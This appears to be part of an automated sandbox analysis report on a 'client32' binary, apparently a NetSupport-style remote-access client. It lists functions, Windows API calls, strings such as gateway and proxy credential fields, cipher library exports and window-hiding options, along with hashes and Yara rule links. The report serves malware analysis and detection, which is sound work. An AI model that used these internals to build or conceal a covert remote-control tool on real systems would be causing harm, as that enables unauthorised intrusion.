Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
API String ID: 909875538-2848211065
Opcode ID: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
Instruction ID: 2ef811b70579311959dfd9ad39713bda9f9f37d801767944afe4c474126e2712
Opcode Fuzzy Hash: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
Instruction Fuzzy Hash: FCD1DD75A042559FDF20CF68CC84BEEBBB5AF4A314F8440D9D81D9B242D7319A84CF92

Function 11028290 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,74591370,?,0000001A), ref: 1102837D
_strrchr.LIBCMT ref: 1102838C

Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B

Strings

NSSConfName, xrefs: 110286F5
??I, xrefs: 11028997
product.dat, xrefs: 11028340, 11028391
NSSName, xrefs: 110285D5
SupportsChrome, xrefs: 11028786
LongName, xrefs: 11028515
??F, xrefs: 11028910
TechConsole, xrefs: 110287BD
Home, xrefs: 11028575
AssistantName, xrefs: 1102872C
AssistantURL, xrefs: 11028759
NSSTLA, xrefs: 11028605
SupportsAndroid, xrefs: 11028822
NSSLongCaption, xrefs: 110287F5
SupportEMail, xrefs: 11028665
\, xrefs: 1102830C
TLA, xrefs: 110285A5
Name, xrefs: 110284DE
NSMAppDataDir, xrefs: 11028695
ShortName, xrefs: 11028545
NSSAppDataDir, xrefs: 110286C5
SupportWWW, xrefs: 11028635

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

Function 685A6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 685A6BD5
GetTickCount.KERNEL32 ref: 685A6C26
Sleep.KERNEL32(00000064), ref: 685A6C5B

Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950

WaitForSingleObject.KERNEL32(000002FC,?), ref: 685A6C7C
_memmove.LIBCMT ref: 685A6C93
select.WSOCK32(00000000,?,00000000,00000000,?), ref: 685A6CB4
Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 685A6CD9
GetTickCount.KERNEL32 ref: 685A6CEC
_calloc.LIBCMT ref: 685A6D76
GetTickCount.KERNEL32 ref: 685A6DF3
InterlockedExchange.KERNEL32(025A2F1A,00000000), ref: 685A6E01
_calloc.LIBCMT ref: 685A6E33
_memmove.LIBCMT ref: 685A6E47
InterlockedDecrement.KERNEL32(025A2EC2), ref: 685A6EC3
SetEvent.KERNEL32(000002F8), ref: 685A6ECF
_memmove.LIBCMT ref: 685A6EF4
GetTickCount.KERNEL32 ref: 685A6F4F
InterlockedExchange.KERNEL32(025A2E62,-685DA188), ref: 685A6F60

Strings

FALSE, xrefs: 685A6E67
ReadMessage returned FALSE. Terminating connection, xrefs: 685A6F3A
ProcessMessage returned FALSE. Terminating connection, xrefs: 685A6F25
httprecv, xrefs: 685A6BDD
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A6E62
ResumeTimeout, xrefs: 685A6BBA

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
API String ID: 1449423504-919941520
Opcode ID: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
Instruction ID: 5768964ac529070e8d603857501e83de661ed71089ed95d69a90bef8bcf9960d
Opcode Fuzzy Hash: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
Instruction Fuzzy Hash: B7B1A0B5D002549FDF20DB68CC84BEEB7B4EB49344F81409AEA59A7240E7B49EC4CF95

Function 11085840 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
LoadLibraryA.KERNEL32(?), ref: 1108592C
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0

Strings

CipherServer_OpenSession, xrefs: 11085978
CipherServer_EncryptBlocks, xrefs: 1108599A
CipherServer_Create, xrefs: 11085941
CipherServer_GetRandomData, xrefs: 110859BC
CipherServer_GetInfoBlock, xrefs: 11085967
CipherServer_Destroy, xrefs: 11085956
CryptPak.dll, xrefs: 1108589B, 110858FE
CipherServer_DecryptBlocks, xrefs: 110859AB
CipherServer_CloseSession, xrefs: 11085989
CipherServer_ResetSession, xrefs: 110859CD

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51

Function 11105D40 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
CloseHandle.KERNEL32(00000000), ref: 11105E29
GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
LoadLibraryA.KERNEL32(?), ref: 11105E71
GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
FreeLibrary.KERNEL32(?), ref: 11105EDB

Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321

GetStockObject.GDI32(0000000D), ref: 11105EEF
GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26

Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2

CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69

Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37

CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F

Strings

GrabKM, xrefs: 11105E98
\pcigina, xrefs: 11105E50
LoggedOn, xrefs: 11105EB0
nsm_gina_sas, xrefs: 11105E04
LPT1, xrefs: 11105DF9

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
API String ID: 539809342-403456261
Opcode ID: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
Opcode Fuzzy Hash: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12

Function 11136060 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

PostMessageA.USER32(000104E4,000006CF,00000007,00000000), ref: 1113623F

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetWindowTextA.USER32(000104E4,00000000), ref: 111362E7
IsWindowVisible.USER32(000104E4), ref: 111363AC
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
IsWindowVisible.USER32(000104E4), ref: 111363DA
SetForegroundWindow.USER32(00000000), ref: 11136408
EnableWindow.USER32(000104E4,00000001), ref: 11136417
IsWindowVisible.USER32(000104E4), ref: 11136468
IsWindowVisible.USER32(000104E4), ref: 11136475
EnableWindow.USER32(000104E4,00000000), ref: 11136489
EnableWindow.USER32(000104E4,00000000), ref: 111363EF

Part of subcall function 1112E330: ShowWindow.USER32(000104E4,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354

EnableWindow.USER32(000104E4,00000001), ref: 1113649D

Strings

ShowUIOnConnect, xrefs: 1113621D
HideWhenIdle, xrefs: 111360DC
ConnectedText, xrefs: 11136178, 11136187
Client, xrefs: 111360E1, 1113618B, 111361C4, 11136222
LockedText, xrefs: 111361BF
ViewedText, xrefs: 1113616B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791

Function 685A33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 685A34FD
wsprintfA.USER32 ref: 685A3727

Strings

Gateway, xrefs: 685A3577
ProxyPassword, xrefs: 685A36F7
:%d, xrefs: 685A34F7
ProxyCred, xrefs: 685A362A
Gateway_UseWebProxy, xrefs: 685A3585
*WebProxy, xrefs: 685A3459
PinProxy, xrefs: 685A35ED
%s:%s, xrefs: 685A3721
Gateway_WebProxy, xrefs: 685A359D
UsePinProxy, xrefs: 685A35D0
*UseWebProxy, xrefs: 685A343C
ProxyUsername, xrefs: 685A36E0
client247, xrefs: 685A362F
*GatewayAddress, xrefs: 685A3430
r<Zh, xrefs: 685A33B3
*PINServer, xrefs: 685A35C4
P, xrefs: 685A3533

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<Zh
API String ID: 2111968516-3873424096
Opcode ID: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
Instruction ID: 33063267e8ada4de353dc1dea75aee9a45cf1d88fb422f9f4f127c992a54f939
Opcode Fuzzy Hash: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
Instruction Fuzzy Hash: 3D2272B6A00368AFDF21CF68CCC0EEEB7B9AB4A204F8485D9E559A7540D6315F84CF51

Function 11030444 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 357libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
GetProcAddress.KERNEL32(00000000), ref: 11030457
GetNativeSystemInfo.KERNEL32(?), ref: 11030465
GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02208D58,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778

Strings

GetNativeSystemInfo, xrefs: 11030444
kernel32.dll, xrefs: 11030449
.%d, xrefs: 11030782
Error %s unloading audiocap dll, xrefs: 1103098F
pcicl32, xrefs: 11030851

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
API String ID: 711497182-3782231422
Opcode ID: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
Opcode Fuzzy Hash: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92

Function 110302A9 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 350registryCOMMON

Download Yara Rule

APIs

Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

RegCloseKey.KERNEL32(?), ref: 110303C3
GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02208D58,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778

Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222

Strings

CurrentVersion, xrefs: 110302BC
3, xrefs: 110303F2
.%d, xrefs: 11030782
CurrentMajorVersionNumber, xrefs: 11030359
Error %s unloading audiocap dll, xrefs: 1103098F
CurrentMinorVersionNumber, xrefs: 1103038C
pcicl32, xrefs: 11030851

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
